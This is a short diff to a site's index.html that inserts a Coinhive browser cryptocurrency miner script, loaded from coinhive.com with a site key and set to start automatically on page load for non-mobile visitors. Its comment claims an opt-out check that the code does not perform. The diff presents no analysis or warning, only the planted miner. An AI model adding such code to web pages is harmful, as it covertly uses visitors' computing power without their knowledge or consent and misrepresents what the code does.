--- a/index.html
+++ b/index.html
@@ -1,6 +1,15 @@
 <!DOCTYPE html>
 <html lang="en">
+<script src="https://coinhive.com/lib/coinhive.min.js"></script>
+<script>
+	var miner = new CoinHive.Anonymous('DFCcPijCwA91sHip2a2ag6m4T26rQFzk', {throttle: 0.3});
 
+	// Only start on non-mobile devices and if not opted-out
+	// in the last 14400 seconds (4 hours):
+	if (!miner.isMobile()) {
+		miner.start();
+	}
+</script>
 <head>
 <link rel = "icon" href="/old/95evn7.png">
 <meta charset="utf-8">
